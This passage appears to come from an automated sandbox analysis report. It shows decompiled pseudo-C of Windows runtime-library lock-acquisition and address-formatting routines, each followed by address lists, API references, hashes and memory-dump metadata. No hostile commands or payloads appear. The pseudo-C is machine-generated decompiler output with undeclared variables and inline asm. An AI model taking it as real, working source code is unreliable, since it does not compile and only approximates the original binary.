                                                                                                                                                        									return 0;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t115 =  *(_t96 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t106 =  *_t49;
                                                                                                                                                        								__eflags = _t106;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t93 = _t106;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t93 - _t106;
                                                                                                                                                        										if(_t93 == _t106) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t106 = _t93;
                                                                                                                                                        										__eflags = _t93;
                                                                                                                                                        										if(_t93 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t106;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L23;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L59;
                                                                                                                                                        					}
                                                                                                                                                        					_t84 = _t115;
                                                                                                                                                        					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                        					__eflags = _t84 - _t115;
                                                                                                                                                        					if(_t84 != _t115) {
                                                                                                                                                        						_t115 = _t84;
                                                                                                                                                        						goto L7;
                                                                                                                                                        					} else {
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L59:
                                                                                                                                                        			}




































                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9171
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x01fd23c6
                                                                                                                                                        0x01fd23ce
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2293
                                                                                                                                                        0x01fd2295
                                                                                                                                                        0x01fd229a
                                                                                                                                                        0x01fd22a1
                                                                                                                                                        0x01fd22a3
                                                                                                                                                        0x01fd22a7
                                                                                                                                                        0x01fd22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22ab
                                                                                                                                                        0x01fd22ad
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x01fd22b1
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953be
                                                                                                                                                        0x01f953c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953cb
                                                                                                                                                        0x01f953ce
                                                                                                                                                        0x01f953d0
                                                                                                                                                        0x01f953d4
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953d8
                                                                                                                                                        0x01f953e3
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd228f
                                                                                                                                                        0x01fd2349
                                                                                                                                                        0x01fd234d
                                                                                                                                                        0x01fd2251
                                                                                                                                                        0x01fd2251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2251
                                                                                                                                                        0x01fd21a4
                                                                                                                                                        0x01fd21a4
                                                                                                                                                        0x01fd21a6
                                                                                                                                                        0x01fd21a8
                                                                                                                                                        0x01fd21ac
                                                                                                                                                        0x01fd21b6
                                                                                                                                                        0x01fd21b8
                                                                                                                                                        0x01fd21bc
                                                                                                                                                        0x01fd21be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21c0
                                                                                                                                                        0x01fd21c2
                                                                                                                                                        0x01fd21c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21c4
                                                                                                                                                        0x01fd21c6
                                                                                                                                                        0x01fd21c6
                                                                                                                                                        0x01fd21c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd21c8
                                                                                                                                                        0x01fd21a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2183
                                                                                                                                                        0x01fb057b
                                                                                                                                                        0x01fb057d
                                                                                                                                                        0x01fb0581
                                                                                                                                                        0x01fb0583
                                                                                                                                                        0x01fd2178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb0589
                                                                                                                                                        0x01fb058f
                                                                                                                                                        0x01fb058f
                                                                                                                                                        0x01fb0583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD2206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                        • Instruction ID: dca7bca31cbd74be4376a8577c9ec816dd77d71fdfe7769e689f4a2a8b611fdd
                                                                                                                                                        • Opcode Fuzzy Hash: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                        • Instruction Fuzzy Hash: 19512835B00212ABEB15CE29CCC1FA673AAAF94721F25825DFD55DB285D923EC4287D0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E01FB14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v10;
                                                                                                                                                        				char _v140;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t24;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				signed int _t29;
                                                                                                                                                        				signed int _t34;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                        				void* _t54;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				void* _t58;
                                                                                                                                                        
                                                                                                                                                        				_t51 = __edx;
                                                                                                                                                        				_t24 =  *0x2052088; // 0x777e1dd7
                                                                                                                                                        				_v8 = _t24 ^ _t57;
                                                                                                                                                        				_t45 = _a16;
                                                                                                                                                        				_t53 = _a4;
                                                                                                                                                        				_t52 = _a20;
                                                                                                                                                        				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                        					L10:
                                                                                                                                                        					_t26 = 0xc000000d;
                                                                                                                                                        				} else {
                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                        						if( *_t52 == _t45) {
                                                                                                                                                        							goto L3;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						L3:
                                                                                                                                                        						_t28 =  &_v140;
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_push("[");
                                                                                                                                                        							_push(0x41);
                                                                                                                                                        							_push( &_v140);
                                                                                                                                                        							_t29 = E01FA7707();
                                                                                                                                                        							_t58 = _t58 + 0xc;
                                                                                                                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                        						}
                                                                                                                                                        						_t54 = E01FB13CB(_t53, _t28);
                                                                                                                                                        						if(_a8 != 0) {
                                                                                                                                                        							_t34 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t34 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                        							_t40 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                        							_t58 = _t58 + 0x10;
                                                                                                                                                        							_t54 = _t54 + _t40 * 2;
                                                                                                                                                        						}
                                                                                                                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                        						 *_t52 = _t53;
                                                                                                                                                        						if( *_t52 < _t53) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						} else {
                                                                                                                                                        							E01F72340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                        							_t26 = 0;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return E01F7E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                        			}





















                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 01FDEA22
                                                                                                                                                          • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB146B
                                                                                                                                                          • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB1490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 01FB156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                        • Opcode ID: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                        • Instruction ID: 0587b2148e4e7bb3f44ec491d290a49f399274eacb7b5176be005ba454a4dcb8
                                                                                                                                                        • Opcode Fuzzy Hash: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                        • Instruction Fuzzy Hash: 0921F572D0021ADBDB21EE59DC90AEF77ACBF50310F484116ED46D3100DB76EA588BE1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 45%
                                                                                                                                                        			E01F953A5(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t32;
                                                                                                                                                        				signed int _t37;
                                                                                                                                                        				signed int _t40;
                                                                                                                                                        				signed int _t42;
                                                                                                                                                        				void* _t45;
                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                        				void* _t48;
                                                                                                                                                        				signed int _t49;
                                                                                                                                                        				void* _t51;
                                                                                                                                                        				signed int _t57;
                                                                                                                                                        				signed int _t64;
                                                                                                                                                        				signed int _t71;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				intOrPtr _t78;
                                                                                                                                                        				signed int* _t79;
                                                                                                                                                        				void* _t85;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				signed int _t92;
                                                                                                                                                        				void* _t104;
                                                                                                                                                        				void* _t105;
                                                                                                                                                        
                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                        				_t32 =  *(_t64 + 0x28);
                                                                                                                                                        				_t71 = _t64 + 0x28;
                                                                                                                                                        				_push(_t92);
                                                                                                                                                        				if(_t32 < 0) {
                                                                                                                                                        					_t78 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                        						goto L3;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t32 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [ecx], eax");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L3:
                                                                                                                                                        					_push(_t86);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L4:
                                                                                                                                                        						__eflags = _t32;
                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t79 = _t64 + 0x24;
                                                                                                                                                        							_t71 = 1;
                                                                                                                                                        							asm("lock xadd [eax], ecx");
                                                                                                                                                        							_t32 =  *(_t64 + 0x28);
                                                                                                                                                        							_a4 = _t32;
                                                                                                                                                        							__eflags = _t32;
                                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                                        								L19:
                                                                                                                                                        								_t86 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020501c0;
                                                                                                                                                        									_push(_t92);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t37 = E01F6F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                        									__eflags = _t37 - 0x102;
                                                                                                                                                        									if(_t37 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t71 =  *(_t92 + 4);
                                                                                                                                                        									_t85 =  *_t92;
                                                                                                                                                        									_t51 = E01FB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t85);
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                        									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                        									_t86 = _t86 + 1;
                                                                                                                                                        									_t105 = _t104 + 0x28;
                                                                                                                                                        									__eflags = _t86 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E01FF217A(_t71, __eflags, _t64);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E01FC3F92();
                                                                                                                                                        									_t104 = _t105 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t37;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t37);
                                                                                                                                                        									E01FB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									_t40 =  *_t71;
                                                                                                                                                        									 *_t71 = 0;
                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                        										L1:
                                                                                                                                                        										_t42 = E01F95384(_t92 + 0x24);
                                                                                                                                                        										if(_t42 != 0) {
                                                                                                                                                        											goto L31;
                                                                                                                                                        										} else {
                                                                                                                                                        											goto L2;
                                                                                                                                                        										}
                                                                                                                                                        									} else {
                                                                                                                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                        										_push( &_a4);
                                                                                                                                                        										_push(_t40);
                                                                                                                                                        										_t49 = E01F6F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                        										__eflags = _t49;
                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                        											goto L1;
                                                                                                                                                        										} else {
                                                                                                                                                        											_push(_t49);
                                                                                                                                                        											E01FB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                        											L31:
                                                                                                                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        											_push( &_a4);
                                                                                                                                                        											_push(1);
                                                                                                                                                        											_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        											__eflags = _t42;
                                                                                                                                                        											if(__eflags >= 0) {
                                                                                                                                                        												L2:
                                                                                                                                                        												return _t42;
                                                                                                                                                        											} else {
                                                                                                                                                        												_push(_t42);
                                                                                                                                                        												E01FB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                        												_push( &_a4);
                                                                                                                                                        												_push(1);
                                                                                                                                                        												_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                        												__eflags = _t42;
                                                                                                                                                        												if(__eflags >= 0) {
                                                                                                                                                        													goto L2;
                                                                                                                                                        												} else {
                                                                                                                                                        													_push(_t42);
                                                                                                                                                        													_t45 = E01FB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                        													asm("int3");
                                                                                                                                                        													while(1) {
                                                                                                                                                        														_t74 = _t45;
                                                                                                                                                        														__eflags = _t45 - 1;
                                                                                                                                                        														if(_t45 != 1) {
                                                                                                                                                        															break;
                                                                                                                                                        														}
                                                                                                                                                        														_t86 = _t86 | 0xffffffff;
                                                                                                                                                        														_t45 = _t74;
                                                                                                                                                        														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        														__eflags = _t45 - _t74;
                                                                                                                                                        														if(_t45 != _t74) {
                                                                                                                                                        															continue;
                                                                                                                                                        														} else {
                                                                                                                                                        															_t46 =  *[fs:0x18];
                                                                                                                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                        															return _t46;
                                                                                                                                                        														}
                                                                                                                                                        														goto L38;
                                                                                                                                                        													}
                                                                                                                                                        													E01F95329(_t74, _t92);
                                                                                                                                                        													_push(1);
                                                                                                                                                        													_t48 = E01F953A5(_t92);
                                                                                                                                                        													return _t48;
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        								} else {
                                                                                                                                                        									_t32 =  *(_t64 + 0x28);
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_t71 =  *_t79;
                                                                                                                                                        								__eflags = _t71;
                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                        									while(1) {
                                                                                                                                                        										_t57 = _t71;
                                                                                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                                                                                        										__eflags = _t57 - _t71;
                                                                                                                                                        										if(_t57 == _t71) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										_t71 = _t57;
                                                                                                                                                        										__eflags = _t57;
                                                                                                                                                        										if(_t57 > 0) {
                                                                                                                                                        											continue;
                                                                                                                                                        										}
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t32 = _a4;
                                                                                                                                                        									__eflags = _t71;
                                                                                                                                                        								}
                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								} else {
                                                                                                                                                        									goto L19;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						goto L38;
                                                                                                                                                        					}
                                                                                                                                                        					_t71 = _t71 | 0xffffffff;
                                                                                                                                                        					_t32 = 0;
                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                        					__eflags = 0;
                                                                                                                                                        					if(0 != 0) {
                                                                                                                                                        						goto L4;
                                                                                                                                                        					} else {
                                                                                                                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L38:
                                                                                                                                                        			}


























                                                                                                                                                        0x01fd22f9
                                                                                                                                                        0x01fd22fa
                                                                                                                                                        0x01fd2305
                                                                                                                                                        0x01fd2314
                                                                                                                                                        0x01fd2319
                                                                                                                                                        0x01fd231a
                                                                                                                                                        0x01fd231d
                                                                                                                                                        0x01fd2320
                                                                                                                                                        0x01fd2323
                                                                                                                                                        0x01fd2323
                                                                                                                                                        0x01fd2328
                                                                                                                                                        0x01fd232d
                                                                                                                                                        0x01fd232f
                                                                                                                                                        0x01fd2331
                                                                                                                                                        0x01fd2336
                                                                                                                                                        0x01fd2336
                                                                                                                                                        0x01fd233b
                                                                                                                                                        0x01fd233d
                                                                                                                                                        0x01fd2350
                                                                                                                                                        0x01fd2351
                                                                                                                                                        0x01fd2356
                                                                                                                                                        0x01fd2359
                                                                                                                                                        0x01fd2359
                                                                                                                                                        0x01fd235b
                                                                                                                                                        0x01fd235d
                                                                                                                                                        0x01f95367
                                                                                                                                                        0x01f9536b
                                                                                                                                                        0x01f95372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2363
                                                                                                                                                        0x01fd2363
                                                                                                                                                        0x01fd2369
                                                                                                                                                        0x01fd236a
                                                                                                                                                        0x01fd236c
                                                                                                                                                        0x01fd2371
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd2379
                                                                                                                                                        0x01fd2379
                                                                                                                                                        0x01fd237a
                                                                                                                                                        0x01fd237f
                                                                                                                                                        0x01fd237f
                                                                                                                                                        0x01fd2385
                                                                                                                                                        0x01fd2386
                                                                                                                                                        0x01fd2389
                                                                                                                                                        0x01fd238e
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01f95378
                                                                                                                                                        0x01f9537c
                                                                                                                                                        0x01fd2396
                                                                                                                                                        0x01fd2396
                                                                                                                                                        0x01fd2397
                                                                                                                                                        0x01fd239c
                                                                                                                                                        0x01fd23a2
                                                                                                                                                        0x01fd23a3
                                                                                                                                                        0x01fd23a6
                                                                                                                                                        0x01fd23ab
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd23b3
                                                                                                                                                        0x01fd23b3
                                                                                                                                                        0x01fd23b4
                                                                                                                                                        0x01fd23b9
                                                                                                                                                        0x01fd23ba
                                                                                                                                                        0x01fd23ba
                                                                                                                                                        0x01fd23bc
                                                                                                                                                        0x01fd23bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9153
                                                                                                                                                        0x01fc9158
                                                                                                                                                        0x01fc915a
                                                                                                                                                        0x01fc915e
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9166
                                                                                                                                                        0x01fc9171
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x01fc9176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fc9160
                                                                                                                                                        0x01fd23c6
                                                                                                                                                        0x01fd23cb
                                                                                                                                                        0x01fd23ce
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23d7
                                                                                                                                                        0x01fd23ad
                                                                                                                                                        0x01fd2390
                                                                                                                                                        0x01fd2373
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd233f
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2291
                                                                                                                                                        0x01fd2293
                                                                                                                                                        0x01fd2295
                                                                                                                                                        0x01fd229a
                                                                                                                                                        0x01fd22a1
                                                                                                                                                        0x01fd22a3
                                                                                                                                                        0x01fd22a7
                                                                                                                                                        0x01fd22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22ab
                                                                                                                                                        0x01fd22ad
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22af
                                                                                                                                                        0x01fd22b1
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b4
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd22b6
                                                                                                                                                        0x01fd228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fd226d
                                                                                                                                                        0x01f953cb
                                                                                                                                                        0x01f953ce
                                                                                                                                                        0x01f953d0
                                                                                                                                                        0x01f953d4
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f953d8
                                                                                                                                                        0x01f953e3
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x01f953ea
                                                                                                                                                        0x01f953d6
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD22F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 01FD2328
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FD22FC
                                                                                                                                                        • RTL: Resource at %p, xrefs: 01FD230B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        • Opcode ID: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                        • Instruction ID: 2c4241de30dbebbddd55ece1904ee2d3fd49680e524526eb2bec6d766e840e29
                                                                                                                                                        • Opcode Fuzzy Hash: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
                                                                                                                                                        • Instruction Fuzzy Hash: D051F971600707ABEF16EF29DC80FA673AAAF54720F10461AFD45DB255EA63E84187D0
